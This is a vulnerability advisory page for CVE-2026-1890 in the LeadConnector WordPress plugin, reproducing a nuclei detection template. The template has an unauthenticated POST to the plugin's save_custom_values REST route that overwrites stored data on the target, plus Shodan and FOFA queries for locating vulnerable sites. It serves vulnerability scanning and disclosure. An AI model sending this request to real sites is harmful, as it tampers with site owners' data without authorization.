
LeadConnector < 3.0.22 - Unauthenticated Arbitrary Data Write

03 Jul 2026 04:19:18 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

LeadConnector plugin before 3.0.22 has an unauthenticated REST route that allows arbitrary data write.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| ATTACKERKB | CVE-2026-1890 | 26 Mar 2026 06:00 | attackerkb |
| Circl | CVE-2026-1890 | 26 Mar 2026 09:06 | circl |
| CNNVD | WordPress plugin LeadConnector security vulnerability | 26 Mar 2026 00:00 | cnnvd |
| CVE | CVE-2026-1890 | 26 Mar 2026 06:00 | cve |
| Cvelist | CVE-2026-1890 LeadConnector < 3.0.22 - Unauthenticated Rest Call | 26 Mar 2026 06:00 | cvelist |
| EUVD | EUVD-2026-16124 | 26 Mar 2026 09:30 | euvd |
| NVD | CVE-2026-1890 | 26 Mar 2026 07:16 | nvd |
| Patchstack | WordPress LeadConnector plugin < 3.0.22 - Unauthenticated Rest Call vulnerability | 30 Mar 2026 12:47 | patchstack |
| Positive Technologies | PT-2026-28216 | 26 Mar 2026 00:00 | ptsecurity |
| VulnCheck KEV | VulnCheck KEV: CVE-2026-1890 | 30 Apr 2026 00:00 | vulncheck_kev |

id: CVE-2026-1890

info:
  name: LeadConnector < 3.0.22 - Unauthenticated Arbitrary Data Write
  author: 0x_Akoko
  severity: medium
  description: |
   LeadConnector WordPress plugin < 3.0.22 contains a broken access control caused by missing authorization in a REST route, letting unauthenticated attackers overwrite existing data remotely, exploit requires no authentication.
  impact: |
   Unauthenticated attackers can overwrite existing data, potentially leading to data tampering and loss of integrity.
  remediation: |
   Update to version 3.0.22 or later.
  reference:
    - https://wpscan.com/vulnerability/9b88be70-b5cc-4a3f-a871-64d61cb02076/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1890
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-1890
    epss-score: 0.00241
    epss-percentile: 0.15166
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 2
    vendor: leadconnector
    product: leadconnector
    fofa-query: body="/wp-content/plugins/leadconnector/"
    shodan-query: http.html:"leadconnector"
    tags: cve,cve2026,wordpress,wp-plugin,leadconnector,unauth,rest-api,intrusive,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/leadconnector/README.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "LeadConnector")'
          - 'compare_versions(lsversion, ">=1.0.0", "<=3.0.21")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: lsversion
        internal: true
        regex:
          - 'Stable tag: ([\d.]+)'
        group: 1

  - raw:
      - |
        POST /wp-json/lc_internal_api/v1/save_custom_values HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"custom_values":[{"fieldKey":"{{randstr}}","id":"1"}]}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "status", "success")'
        condition: and
# digest: 490a0046304402207ad59c087a3ef6bbae1a88384d21a4d23349b8834be580a954c8546df895367e022004f4497c2bfe25cfc6a1c86462d18a7f50140a97ff29018e1b28868882138d42:922c64590222798bb761d5b6d8e72950

Scores (current as of 02 Jul 2026 04:20):
Vulners AI Score: 5.9 (Medium risk)
CVSS 3.1: 5.3
EPSS: 0.00241